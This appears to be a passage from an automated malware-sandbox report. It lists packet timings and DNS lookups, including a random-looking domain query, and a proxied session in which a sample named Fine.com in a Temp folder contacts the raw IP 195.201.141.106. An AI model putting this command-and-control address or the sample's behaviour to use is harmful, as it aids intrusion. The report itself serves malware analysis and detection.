                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.374063015 CET53506931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.382639885 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.683643103 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.825702906 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.825730085 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.825932980 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.825949907 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.827457905 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.827696085 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.827764988 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.827990055 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.828107119 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.828223944 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.828301907 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921408892 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921426058 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921439886 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921446085 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.921979904 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.922116041 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.924140930 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.925323963 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.926243067 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.926276922 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.926422119 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.937591076 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:12.937783003 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.015418053 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.041074038 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.648195028 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.648260117 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.690757990 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.691030979 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.693511009 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.693614006 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.695583105 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.695653915 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.742860079 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.744002104 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.744328976 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.744945049 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.772337914 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.785320044 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.786070108 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.786535025 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.786845922 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.787882090 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.788506985 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.788691998 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.788836956 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.789808989 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.790983915 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.828320026 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.828411102 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.830558062 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.870685101 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.921755075 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.949278116 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.073662996 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.125691891 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.125957012 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.220305920 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.221400023 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.221916914 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.222251892 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.244697094 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.244740009 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.244766951 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.244791031 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.246350050 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.248574972 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.248684883 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348614931 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348666906 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348726988 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348754883 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348975897 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.349039078 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.447930098 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.477376938 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.536228895 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.536340952 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.630831957 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.631721020 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.632046938 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.632358074 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.015827894 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.015935898 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.016181946 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.016370058 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.129070997 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.129108906 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.129139900 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.134067059 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.134320974 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.138772964 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.138787031 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.138798952 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.138940096 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.139259100 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.139811993 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.233926058 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.235100985 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.235584021 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:15.237575054 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.699527025 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.699846029 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.795389891 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.797620058 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.808700085 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:28.811750889 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.690582037 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.691031933 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.691829920 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.692323923 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.785465956 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.786534071 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.786695957 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.788619041 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.792483091 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.793584108 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.793942928 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:29.794212103 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:24:10.996860027 CET63465443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:24:10.997071981 CET63465443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:24:10.997334957 CET63465443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:24:10.997596025 CET63465443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:24:11.456592083 CET44363465162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:24:12.456094027 CET44363465162.159.61.3192.168.2.5

                                                                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:07.634160995 CET192.168.2.51.1.1.10xd10bStandard query (0)LBkgcUFdJvUBmfKVwVgI.LBkgcUFdJvUBmfKVwVgIA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:53.720724106 CET192.168.2.51.1.1.10x1f7dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:53.720943928 CET192.168.2.51.1.1.10xe019Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:57.973501921 CET192.168.2.51.1.1.10x742fStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:57.973696947 CET192.168.2.51.1.1.10xb2f8Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:58.967406034 CET192.168.2.51.1.1.10x4498Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:58.967561960 CET192.168.2.51.1.1.10xb66bStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:06.867572069 CET192.168.2.51.1.1.10x1bc8Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:06.867799997 CET192.168.2.51.1.1.10xe568Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:08.698239088 CET192.168.2.51.1.1.10x8615Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:08.701677084 CET192.168.2.51.1.1.10x2655Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.792751074 CET192.168.2.51.1.1.10x2862Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.794186115 CET192.168.2.51.1.1.10xe6efStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.801574945 CET192.168.2.51.1.1.10xb49bStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.801748991 CET192.168.2.51.1.1.10x588dStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.804160118 CET192.168.2.51.1.1.10xd8eStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.804301977 CET192.168.2.51.1.1.10xf66aStandard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.814491987 CET192.168.2.51.1.1.10x2ea8Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.814671040 CET192.168.2.51.1.1.10x6a8eStandard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.915841103 CET192.168.2.51.1.1.10xd5d2Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.916019917 CET192.168.2.51.1.1.10x787fStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.330097914 CET192.168.2.51.1.1.10xfcdaStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.330210924 CET192.168.2.51.1.1.10x638dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.330460072 CET192.168.2.51.1.1.10xe754Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.330579042 CET192.168.2.51.1.1.10x7e84Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.366833925 CET192.168.2.51.1.1.10x800bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.367089987 CET192.168.2.51.1.1.10x814bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:07.643079996 CET1.1.1.1192.168.2.50xd10bName error (3)LBkgcUFdJvUBmfKVwVgI.LBkgcUFdJvUBmfKVwVgInonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.690006971 CET1.1.1.1192.168.2.50xe019No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:54.690218925 CET1.1.1.1192.168.2.50x1f7dNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:57.980499029 CET1.1.1.1192.168.2.50x742fNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:57.980499029 CET1.1.1.1192.168.2.50x742fNo error (0)plus.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:57.981101036 CET1.1.1.1192.168.2.50xb2f8No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:22:58.974380970 CET1.1.1.1192.168.2.50x4498No error (0)play.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:06.874280930 CET1.1.1.1192.168.2.50x1bc8No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:06.875907898 CET1.1.1.1192.168.2.50xe568No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:07.784198046 CET1.1.1.1192.168.2.50x68efNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:07.784198046 CET1.1.1.1192.168.2.50x68efNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:07.784665108 CET1.1.1.1192.168.2.50xb611No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:08.707348108 CET1.1.1.1192.168.2.50x8615No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:08.709286928 CET1.1.1.1192.168.2.50x2655No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.799400091 CET1.1.1.1192.168.2.50x2862No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.799400091 CET1.1.1.1192.168.2.50x2862No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.799400091 CET1.1.1.1192.168.2.50x2862No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.799400091 CET1.1.1.1192.168.2.50x2862No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.808373928 CET1.1.1.1192.168.2.50xb49bNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.808665991 CET1.1.1.1192.168.2.50x588dNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.811198950 CET1.1.1.1192.168.2.50xd8eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.811866045 CET1.1.1.1192.168.2.50xf66aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.821106911 CET1.1.1.1192.168.2.50x2ea8No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.821523905 CET1.1.1.1192.168.2.50x6a8eNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.922854900 CET1.1.1.1192.168.2.50xd5d2No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.922854900 CET1.1.1.1192.168.2.50xd5d2No error (0)googlehosted.l.googleusercontent.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.923552990 CET1.1.1.1192.168.2.50x787fNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.336710930 CET1.1.1.1192.168.2.50x638dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.336926937 CET1.1.1.1192.168.2.50xfcdaNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.336926937 CET1.1.1.1192.168.2.50xfcdaNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.337254047 CET1.1.1.1192.168.2.50x7e84No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.337492943 CET1.1.1.1192.168.2.50xe754No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.337492943 CET1.1.1.1192.168.2.50xe754No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.373568058 CET1.1.1.1192.168.2.50x814bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.374063015 CET1.1.1.1192.168.2.50x800bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.374063015 CET1.1.1.1192.168.2.50x800bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                          • 195.201.141.106
                                                                                                                                                                                                                                                                                                                          • www.google.com
                                                                                                                                                                                                                                                                                                                          • apis.google.com
                                                                                                                                                                                                                                                                                                                          • play.google.com
                                                                                                                                                                                                                                                                                                                          • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                                                                                                            • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                            • c.msn.com
                                                                                                                                                                                                                                                                                                                            • browser.events.data.msn.com

                                                                                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          0192.168.2.549851195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:43 UTC90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:44 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
